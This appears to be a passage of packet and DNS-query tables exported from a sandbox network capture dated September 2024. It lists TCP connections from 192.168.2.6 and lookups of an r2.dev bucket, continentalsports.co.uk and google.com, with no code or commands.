      Sep 29, 2024 02:45:37.641062021 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.641067982 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.641091108 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.641602993 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.641633034 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.641663074 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.641675949 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.641686916 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.641726017 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.641761065 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.641774893 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.641782999 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.641796112 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.642590046 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.642626047 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.642642021 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.642649889 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.642673969 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.642680883 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.642687082 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.642724037 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.642731905 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.642750978 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.643460989 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.643492937 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.643522024 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.643528938 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.643553019 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.643584013 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.643630028 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.643636942 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.643647909 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.643666983 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.643676996 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.643719912 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.643726110 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.643774033 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.644453049 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.644517899 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.730201006 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.730263948 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.730266094 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.730278969 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.730312109 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.730326891 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.730355978 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.730406046 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.942372084 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.942441940 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.942451954 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.942460060 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.942487001 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.942492008 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.942526102 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.942538023 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.942586899 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.942595005 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.942637920 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.942687988 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.942692995 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.942702055 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.942733049 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.942734957 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.942747116 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.942769051 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.942791939 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.942805052 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.942814112 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.942817926 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.942847013 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.942852974 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.942876101 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.942898035 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:37.942939997 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.994049072 CEST49718443192.168.2.6162.159.140.237
      Sep 29, 2024 02:45:37.994066000 CEST44349718162.159.140.237192.168.2.6
      Sep 29, 2024 02:45:38.907243967 CEST44349705173.222.162.64192.168.2.6
      Sep 29, 2024 02:45:38.907330036 CEST49705443192.168.2.6173.222.162.64
      Sep 29, 2024 02:45:38.931504965 CEST49722443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:38.931530952 CEST4434972295.154.228.177192.168.2.6
      Sep 29, 2024 02:45:38.931891918 CEST49722443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:38.931891918 CEST49722443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:38.931919098 CEST4434972295.154.228.177192.168.2.6
      Sep 29, 2024 02:45:39.340405941 CEST49723443192.168.2.6142.250.185.132
      Sep 29, 2024 02:45:39.340446949 CEST44349723142.250.185.132192.168.2.6
      Sep 29, 2024 02:45:39.340523005 CEST49723443192.168.2.6142.250.185.132
      Sep 29, 2024 02:45:39.342217922 CEST49723443192.168.2.6142.250.185.132
      Sep 29, 2024 02:45:39.342235088 CEST44349723142.250.185.132192.168.2.6
      Sep 29, 2024 02:45:39.701560020 CEST4434972295.154.228.177192.168.2.6
      Sep 29, 2024 02:45:39.709974051 CEST49722443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:39.710000038 CEST4434972295.154.228.177192.168.2.6
      Sep 29, 2024 02:45:39.711610079 CEST4434972295.154.228.177192.168.2.6
      Sep 29, 2024 02:45:39.711668015 CEST49722443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:39.738500118 CEST49722443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:39.738862991 CEST4434972295.154.228.177192.168.2.6
      Sep 29, 2024 02:45:39.754913092 CEST49722443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:39.754933119 CEST4434972295.154.228.177192.168.2.6
      Sep 29, 2024 02:45:39.797801971 CEST49722443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:39.937648058 CEST4434972295.154.228.177192.168.2.6
      Sep 29, 2024 02:45:39.937726974 CEST4434972295.154.228.177192.168.2.6
      Sep 29, 2024 02:45:39.937752008 CEST4434972295.154.228.177192.168.2.6
      Sep 29, 2024 02:45:39.937771082 CEST4434972295.154.228.177192.168.2.6
      Sep 29, 2024 02:45:39.937810898 CEST49722443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:39.937829971 CEST4434972295.154.228.177192.168.2.6
      Sep 29, 2024 02:45:39.937858105 CEST49722443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:39.937937021 CEST4434972295.154.228.177192.168.2.6
      Sep 29, 2024 02:45:39.939738035 CEST49722443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:39.939747095 CEST4434972295.154.228.177192.168.2.6
      Sep 29, 2024 02:45:39.939779043 CEST49722443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:40.024813890 CEST44349723142.250.185.132192.168.2.6
      Sep 29, 2024 02:45:40.025865078 CEST49723443192.168.2.6142.250.185.132
      Sep 29, 2024 02:45:40.025888920 CEST44349723142.250.185.132192.168.2.6
      Sep 29, 2024 02:45:40.027008057 CEST44349723142.250.185.132192.168.2.6
      Sep 29, 2024 02:45:40.027602911 CEST49723443192.168.2.6142.250.185.132
      Sep 29, 2024 02:45:40.028693914 CEST49723443192.168.2.6142.250.185.132
      Sep 29, 2024 02:45:40.028754950 CEST44349723142.250.185.132192.168.2.6
      Sep 29, 2024 02:45:40.071872950 CEST49725443192.168.2.6184.28.90.27
      Sep 29, 2024 02:45:40.071901083 CEST44349725184.28.90.27192.168.2.6
      Sep 29, 2024 02:45:40.072041988 CEST49725443192.168.2.6184.28.90.27
      Sep 29, 2024 02:45:40.075306892 CEST49725443192.168.2.6184.28.90.27
      Sep 29, 2024 02:45:40.075320005 CEST44349725184.28.90.27192.168.2.6
      Sep 29, 2024 02:45:40.079586029 CEST49723443192.168.2.6142.250.185.132
      Sep 29, 2024 02:45:40.079605103 CEST44349723142.250.185.132192.168.2.6
      Sep 29, 2024 02:45:40.126327991 CEST49723443192.168.2.6142.250.185.132
      Sep 29, 2024 02:45:40.324078083 CEST49729443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:40.324124098 CEST4434972995.154.228.177192.168.2.6
      Sep 29, 2024 02:45:40.324258089 CEST49729443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:40.324419022 CEST49729443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:40.324434996 CEST4434972995.154.228.177192.168.2.6
      Sep 29, 2024 02:45:40.754683971 CEST44349725184.28.90.27192.168.2.6
      Sep 29, 2024 02:45:40.754851103 CEST49725443192.168.2.6184.28.90.27
      Sep 29, 2024 02:45:40.957667112 CEST49725443192.168.2.6184.28.90.27
      Sep 29, 2024 02:45:40.957691908 CEST44349725184.28.90.27192.168.2.6
      Sep 29, 2024 02:45:40.958606005 CEST44349725184.28.90.27192.168.2.6
      Sep 29, 2024 02:45:41.013050079 CEST49725443192.168.2.6184.28.90.27
      Sep 29, 2024 02:45:41.116024017 CEST4434972995.154.228.177192.168.2.6
      Sep 29, 2024 02:45:41.235649109 CEST49729443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:41.235671997 CEST4434972995.154.228.177192.168.2.6
      Sep 29, 2024 02:45:41.236881018 CEST4434972995.154.228.177192.168.2.6
      Sep 29, 2024 02:45:41.236895084 CEST4434972995.154.228.177192.168.2.6
      Sep 29, 2024 02:45:41.236941099 CEST49729443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:41.265683889 CEST49729443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:41.265840054 CEST4434972995.154.228.177192.168.2.6
      Sep 29, 2024 02:45:41.267869949 CEST49729443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:41.267883062 CEST4434972995.154.228.177192.168.2.6
      Sep 29, 2024 02:45:41.325536966 CEST49729443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:41.435139894 CEST4434972995.154.228.177192.168.2.6
      Sep 29, 2024 02:45:41.435164928 CEST4434972995.154.228.177192.168.2.6
      Sep 29, 2024 02:45:41.435172081 CEST4434972995.154.228.177192.168.2.6
      Sep 29, 2024 02:45:41.435199022 CEST4434972995.154.228.177192.168.2.6
      Sep 29, 2024 02:45:41.435215950 CEST49729443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:41.435228109 CEST4434972995.154.228.177192.168.2.6
      Sep 29, 2024 02:45:41.435240984 CEST4434972995.154.228.177192.168.2.6
      Sep 29, 2024 02:45:41.435250044 CEST49729443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:41.435288906 CEST49729443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:41.476006031 CEST49725443192.168.2.6184.28.90.27
      Sep 29, 2024 02:45:41.477771997 CEST49729443192.168.2.695.154.228.177
      Sep 29, 2024 02:45:41.477786064 CEST4434972995.154.228.177192.168.2.6
      Sep 29, 2024 02:45:41.519404888 CEST44349725184.28.90.27192.168.2.6
      Sep 29, 2024 02:45:41.664150953 CEST44349725184.28.90.27192.168.2.6
      Sep 29, 2024 02:45:41.664316893 CEST44349725184.28.90.27192.168.2.6
      Sep 29, 2024 02:45:41.664369106 CEST49725443192.168.2.6184.28.90.27
      Sep 29, 2024 02:45:41.677726030 CEST49725443192.168.2.6184.28.90.27
      Sep 29, 2024 02:45:41.677747011 CEST44349725184.28.90.27192.168.2.6
      Sep 29, 2024 02:45:41.677759886 CEST49725443192.168.2.6184.28.90.27
      Sep 29, 2024 02:45:41.677764893 CEST44349725184.28.90.27192.168.2.6
      Sep 29, 2024 02:45:41.725929022 CEST49730443192.168.2.6184.28.90.27
      Sep 29, 2024 02:45:41.725976944 CEST44349730184.28.90.27192.168.2.6
      Sep 29, 2024 02:45:41.726056099 CEST49730443192.168.2.6184.28.90.27
      Sep 29, 2024 02:45:41.726526022 CEST49730443192.168.2.6184.28.90.27
      Sep 29, 2024 02:45:41.726540089 CEST44349730184.28.90.27192.168.2.6
      Sep 29, 2024 02:45:42.364607096 CEST44349730184.28.90.27192.168.2.6
      Sep 29, 2024 02:45:42.364794016 CEST49730443192.168.2.6184.28.90.27
      Sep 29, 2024 02:45:42.366255045 CEST49730443192.168.2.6184.28.90.27
      Sep 29, 2024 02:45:42.366265059 CEST44349730184.28.90.27192.168.2.6
      Sep 29, 2024 02:45:42.366508961 CEST44349730184.28.90.27192.168.2.6
      Sep 29, 2024 02:45:42.367964029 CEST49730443192.168.2.6184.28.90.27
      Sep 29, 2024 02:45:42.415402889 CEST44349730184.28.90.27192.168.2.6
      Sep 29, 2024 02:45:42.641630888 CEST44349730184.28.90.27192.168.2.6
      Sep 29, 2024 02:45:42.641719103 CEST44349730184.28.90.27192.168.2.6
      Sep 29, 2024 02:45:42.641882896 CEST49730443192.168.2.6184.28.90.27
      Sep 29, 2024 02:45:42.697388887 CEST49730443192.168.2.6184.28.90.27
      Sep 29, 2024 02:45:42.697406054 CEST44349730184.28.90.27192.168.2.6
      Sep 29, 2024 02:45:42.697503090 CEST49730443192.168.2.6184.28.90.27
      Sep 29, 2024 02:45:42.697510004 CEST44349730184.28.90.27192.168.2.6
      Sep 29, 2024 02:45:43.990612984 CEST49731443192.168.2.640.115.3.253
      Sep 29, 2024 02:45:43.990653992 CEST4434973140.115.3.253192.168.2.6
      Sep 29, 2024 02:45:43.990736008 CEST49731443192.168.2.640.115.3.253
      Sep 29, 2024 02:45:43.991238117 CEST49731443192.168.2.640.115.3.253
      Sep 29, 2024 02:45:43.991247892 CEST4434973140.115.3.253192.168.2.6
      Sep 29, 2024 02:45:44.808146000 CEST4434973140.115.3.253192.168.2.6
      Sep 29, 2024 02:45:44.808238983 CEST49731443192.168.2.640.115.3.253
      Sep 29, 2024 02:45:44.810534954 CEST49731443192.168.2.640.115.3.253
      Sep 29, 2024 02:45:44.810554981 CEST4434973140.115.3.253192.168.2.6
      Sep 29, 2024 02:45:44.810889006 CEST4434973140.115.3.253192.168.2.6
      Sep 29, 2024 02:45:44.813122988 CEST49731443192.168.2.640.115.3.253
      Sep 29, 2024 02:45:44.813205004 CEST49731443192.168.2.640.115.3.253
      Sep 29, 2024 02:45:44.813216925 CEST4434973140.115.3.253192.168.2.6
      Sep 29, 2024 02:45:44.813282013 CEST49731443192.168.2.640.115.3.253
      Sep 29, 2024 02:45:44.859405041 CEST4434973140.115.3.253192.168.2.6
      Sep 29, 2024 02:45:44.995121002 CEST4434973140.115.3.253192.168.2.6
      Sep 29, 2024 02:45:44.995322943 CEST4434973140.115.3.253192.168.2.6
      Sep 29, 2024 02:45:44.995400906 CEST49731443192.168.2.640.115.3.253
      Sep 29, 2024 02:45:44.995501041 CEST49731443192.168.2.640.115.3.253
      Sep 29, 2024 02:45:44.995517015 CEST4434973140.115.3.253192.168.2.6
      Sep 29, 2024 02:45:49.950663090 CEST44349723142.250.185.132192.168.2.6
      Sep 29, 2024 02:45:49.950733900 CEST44349723142.250.185.132192.168.2.6
      Sep 29, 2024 02:45:49.950809956 CEST49723443192.168.2.6142.250.185.132
      Sep 29, 2024 02:45:50.458184004 CEST6111953192.168.2.61.1.1.1
      Sep 29, 2024 02:45:50.462955952 CEST53611191.1.1.1192.168.2.6
      Sep 29, 2024 02:45:50.463218927 CEST6111953192.168.2.61.1.1.1
      Sep 29, 2024 02:45:50.463219881 CEST6111953192.168.2.61.1.1.1
      Sep 29, 2024 02:45:50.467933893 CEST53611191.1.1.1192.168.2.6
      Sep 29, 2024 02:45:50.931796074 CEST53611191.1.1.1192.168.2.6
      Sep 29, 2024 02:45:50.933087111 CEST6111953192.168.2.61.1.1.1
      Sep 29, 2024 02:45:50.938155890 CEST53611191.1.1.1192.168.2.6
      Sep 29, 2024 02:45:50.938214064 CEST6111953192.168.2.61.1.1.1
      Sep 29, 2024 02:45:51.375441074 CEST49723443192.168.2.6142.250.185.132
      Sep 29, 2024 02:45:51.375473976 CEST44349723142.250.185.132192.168.2.6
      Sep 29, 2024 02:45:51.554709911 CEST8049717172.66.0.235192.168.2.6
      Sep 29, 2024 02:45:51.554773092 CEST4971780192.168.2.6172.66.0.235
      Sep 29, 2024 02:45:53.265434980 CEST4971780192.168.2.6172.66.0.235
      Sep 29, 2024 02:45:53.270231962 CEST8049717172.66.0.235192.168.2.6
      Sep 29, 2024 02:45:56.303527117 CEST61120443192.168.2.640.115.3.253
      Sep 29, 2024 02:45:56.303565025 CEST4436112040.115.3.253192.168.2.6
      Sep 29, 2024 02:45:56.303682089 CEST61120443192.168.2.640.115.3.253
      Sep 29, 2024 02:45:56.304337025 CEST61120443192.168.2.640.115.3.253
      Sep 29, 2024 02:45:56.304352045 CEST4436112040.115.3.253192.168.2.6
      Sep 29, 2024 02:45:57.080923080 CEST4436112040.115.3.253192.168.2.6
      Sep 29, 2024 02:45:57.080987930 CEST61120443192.168.2.640.115.3.253
      Sep 29, 2024 02:45:57.086179972 CEST61120443192.168.2.640.115.3.253
      Sep 29, 2024 02:45:57.086184978 CEST4436112040.115.3.253192.168.2.6
      Sep 29, 2024 02:45:57.086450100 CEST4436112040.115.3.253192.168.2.6
      Sep 29, 2024 02:45:57.088094950 CEST61120443192.168.2.640.115.3.253
      Sep 29, 2024 02:45:57.088155031 CEST61120443192.168.2.640.115.3.253
      Sep 29, 2024 02:45:57.088160038 CEST4436112040.115.3.253192.168.2.6
      Sep 29, 2024 02:45:57.088269949 CEST61120443192.168.2.640.115.3.253
      Sep 29, 2024 02:45:57.135401964 CEST4436112040.115.3.253192.168.2.6
      Sep 29, 2024 02:45:57.262841940 CEST4436112040.115.3.253192.168.2.6
      Sep 29, 2024 02:45:57.262937069 CEST4436112040.115.3.253192.168.2.6
      Sep 29, 2024 02:45:57.263067007 CEST61120443192.168.2.640.115.3.253
      Sep 29, 2024 02:45:57.263283014 CEST61120443192.168.2.640.115.3.253
      Sep 29, 2024 02:45:57.263298035 CEST4436112040.115.3.253192.168.2.6
      Sep 29, 2024 02:45:57.263307095 CEST61120443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:15.241061926 CEST61121443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:15.241118908 CEST4436112140.115.3.253192.168.2.6
      Sep 29, 2024 02:46:15.241218090 CEST61121443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:15.241782904 CEST61121443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:15.241801023 CEST4436112140.115.3.253192.168.2.6
      Sep 29, 2024 02:46:16.907787085 CEST4436112140.115.3.253192.168.2.6
      Sep 29, 2024 02:46:16.907867908 CEST61121443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:16.909890890 CEST61121443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:16.909899950 CEST4436112140.115.3.253192.168.2.6
      Sep 29, 2024 02:46:16.910197020 CEST4436112140.115.3.253192.168.2.6
      Sep 29, 2024 02:46:16.911950111 CEST61121443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:16.911950111 CEST61121443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:16.911969900 CEST4436112140.115.3.253192.168.2.6
      Sep 29, 2024 02:46:16.912069082 CEST61121443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:16.959438086 CEST4436112140.115.3.253192.168.2.6
      Sep 29, 2024 02:46:17.086705923 CEST4436112140.115.3.253192.168.2.6
      Sep 29, 2024 02:46:17.086880922 CEST4436112140.115.3.253192.168.2.6
      Sep 29, 2024 02:46:17.086939096 CEST61121443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:17.087069988 CEST61121443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:17.087090969 CEST4436112140.115.3.253192.168.2.6
      Sep 29, 2024 02:46:21.654844046 CEST4971680192.168.2.6172.66.0.235
      Sep 29, 2024 02:46:21.659646034 CEST8049716172.66.0.235192.168.2.6
      Sep 29, 2024 02:46:37.585036039 CEST5918453192.168.2.61.1.1.1
      Sep 29, 2024 02:46:37.590770960 CEST53591841.1.1.1192.168.2.6
      Sep 29, 2024 02:46:37.590857983 CEST5918453192.168.2.61.1.1.1
      Sep 29, 2024 02:46:37.590967894 CEST5918453192.168.2.61.1.1.1
      Sep 29, 2024 02:46:37.596770048 CEST53591841.1.1.1192.168.2.6
      Sep 29, 2024 02:46:38.040752888 CEST53591841.1.1.1192.168.2.6
      Sep 29, 2024 02:46:38.041996956 CEST5918453192.168.2.61.1.1.1
      Sep 29, 2024 02:46:38.047128916 CEST53591841.1.1.1192.168.2.6
      Sep 29, 2024 02:46:38.047216892 CEST5918453192.168.2.61.1.1.1
      Sep 29, 2024 02:46:39.384161949 CEST59187443192.168.2.6142.250.185.132
      Sep 29, 2024 02:46:39.384195089 CEST44359187142.250.185.132192.168.2.6
      Sep 29, 2024 02:46:39.384376049 CEST59187443192.168.2.6142.250.185.132
      Sep 29, 2024 02:46:39.384861946 CEST59187443192.168.2.6142.250.185.132
      Sep 29, 2024 02:46:39.384876013 CEST44359187142.250.185.132192.168.2.6
      Sep 29, 2024 02:46:40.040911913 CEST44359187142.250.185.132192.168.2.6
      Sep 29, 2024 02:46:40.041380882 CEST59187443192.168.2.6142.250.185.132
      Sep 29, 2024 02:46:40.041392088 CEST44359187142.250.185.132192.168.2.6
      Sep 29, 2024 02:46:40.041856050 CEST44359187142.250.185.132192.168.2.6
      Sep 29, 2024 02:46:40.042649984 CEST59187443192.168.2.6142.250.185.132
      Sep 29, 2024 02:46:40.042723894 CEST44359187142.250.185.132192.168.2.6
      Sep 29, 2024 02:46:40.091608047 CEST59187443192.168.2.6142.250.185.132
      Sep 29, 2024 02:46:41.523170948 CEST59188443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:41.523255110 CEST4435918840.115.3.253192.168.2.6
      Sep 29, 2024 02:46:41.523355961 CEST59188443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:41.524131060 CEST59188443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:41.524154902 CEST4435918840.115.3.253192.168.2.6
      Sep 29, 2024 02:46:42.378355026 CEST4435918840.115.3.253192.168.2.6
      Sep 29, 2024 02:46:42.378443956 CEST59188443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:42.383346081 CEST59188443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:42.383361101 CEST4435918840.115.3.253192.168.2.6
      Sep 29, 2024 02:46:42.383622885 CEST4435918840.115.3.253192.168.2.6
      Sep 29, 2024 02:46:42.387882948 CEST59188443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:42.388261080 CEST59188443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:42.388267994 CEST4435918840.115.3.253192.168.2.6
      Sep 29, 2024 02:46:42.388705969 CEST59188443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:42.435417891 CEST4435918840.115.3.253192.168.2.6
      Sep 29, 2024 02:46:42.564146042 CEST4435918840.115.3.253192.168.2.6
      Sep 29, 2024 02:46:42.564251900 CEST4435918840.115.3.253192.168.2.6
      Sep 29, 2024 02:46:42.564419031 CEST59188443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:42.564888954 CEST59188443192.168.2.640.115.3.253
      Sep 29, 2024 02:46:42.564922094 CEST4435918840.115.3.253192.168.2.6
      Sep 29, 2024 02:46:49.963699102 CEST44359187142.250.185.132192.168.2.6
      Sep 29, 2024 02:46:49.963877916 CEST44359187142.250.185.132192.168.2.6
      Sep 29, 2024 02:46:49.964021921 CEST59187443192.168.2.6142.250.185.132
      Sep 29, 2024 02:46:51.299051046 CEST59187443192.168.2.6142.250.185.132
      Sep 29, 2024 02:46:51.299068928 CEST44359187142.250.185.132192.168.2.6
      TimestampSource PortDest PortSource IPDest IP
      Sep 29, 2024 02:45:34.984550953 CEST53524911.1.1.1192.168.2.6
      Sep 29, 2024 02:45:34.986715078 CEST53537021.1.1.1192.168.2.6
      Sep 29, 2024 02:45:36.179968119 CEST5267053192.168.2.61.1.1.1
      Sep 29, 2024 02:45:36.180197954 CEST5360753192.168.2.61.1.1.1
      Sep 29, 2024 02:45:36.188916922 CEST53526701.1.1.1192.168.2.6
      Sep 29, 2024 02:45:36.190208912 CEST53536071.1.1.1192.168.2.6
      Sep 29, 2024 02:45:36.483709097 CEST53535161.1.1.1192.168.2.6
      Sep 29, 2024 02:45:36.661298990 CEST5063053192.168.2.61.1.1.1
      Sep 29, 2024 02:45:36.661633968 CEST5604953192.168.2.61.1.1.1
      Sep 29, 2024 02:45:36.669150114 CEST53506301.1.1.1192.168.2.6
      Sep 29, 2024 02:45:36.671421051 CEST53560491.1.1.1192.168.2.6
      Sep 29, 2024 02:45:38.698404074 CEST5987853192.168.2.61.1.1.1
      Sep 29, 2024 02:45:38.698690891 CEST5164653192.168.2.61.1.1.1
      Sep 29, 2024 02:45:38.707185030 CEST53569981.1.1.1192.168.2.6
      Sep 29, 2024 02:45:38.927730083 CEST53598781.1.1.1192.168.2.6
      Sep 29, 2024 02:45:38.930138111 CEST53516461.1.1.1192.168.2.6
      Sep 29, 2024 02:45:39.317668915 CEST6127453192.168.2.61.1.1.1
      Sep 29, 2024 02:45:39.317868948 CEST5317553192.168.2.61.1.1.1
      Sep 29, 2024 02:45:39.324285030 CEST53612741.1.1.1192.168.2.6
      Sep 29, 2024 02:45:39.324430943 CEST53531751.1.1.1192.168.2.6
      Sep 29, 2024 02:45:39.940546036 CEST53632131.1.1.1192.168.2.6
      Sep 29, 2024 02:45:40.096019983 CEST5601653192.168.2.61.1.1.1
      Sep 29, 2024 02:45:40.096020937 CEST5735953192.168.2.61.1.1.1
      Sep 29, 2024 02:45:40.097501993 CEST53496031.1.1.1192.168.2.6
      Sep 29, 2024 02:45:40.316070080 CEST53573591.1.1.1192.168.2.6
      Sep 29, 2024 02:45:40.323610067 CEST53560161.1.1.1192.168.2.6
      Sep 29, 2024 02:45:50.457323074 CEST53616371.1.1.1192.168.2.6
      Sep 29, 2024 02:45:53.522026062 CEST53517001.1.1.1192.168.2.6
      Sep 29, 2024 02:46:12.477787018 CEST53623661.1.1.1192.168.2.6
      Sep 29, 2024 02:46:34.533204079 CEST53607631.1.1.1192.168.2.6
      Sep 29, 2024 02:46:34.867496014 CEST53547301.1.1.1192.168.2.6
      Sep 29, 2024 02:46:37.584543943 CEST53624931.1.1.1192.168.2.6
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Sep 29, 2024 02:45:36.179968119 CEST192.168.2.61.1.1.10xf88dStandard query (0)pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.devA (IP address)IN (0x0001)false
      Sep 29, 2024 02:45:36.180197954 CEST192.168.2.61.1.1.10xb433Standard query (0)pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.dev65IN (0x0001)false
      Sep 29, 2024 02:45:36.661298990 CEST192.168.2.61.1.1.10xa413Standard query (0)pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.devA (IP address)IN (0x0001)false
      Sep 29, 2024 02:45:36.661633968 CEST192.168.2.61.1.1.10x388eStandard query (0)pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.dev65IN (0x0001)false
      Sep 29, 2024 02:45:38.698404074 CEST192.168.2.61.1.1.10xd11fStandard query (0)www.continentalsports.co.ukA (IP address)IN (0x0001)false
      Sep 29, 2024 02:45:38.698690891 CEST192.168.2.61.1.1.10x3222Standard query (0)www.continentalsports.co.uk65IN (0x0001)false
      Sep 29, 2024 02:45:39.317668915 CEST192.168.2.61.1.1.10xc1deStandard query (0)www.google.comA (IP address)IN (0x0001)false
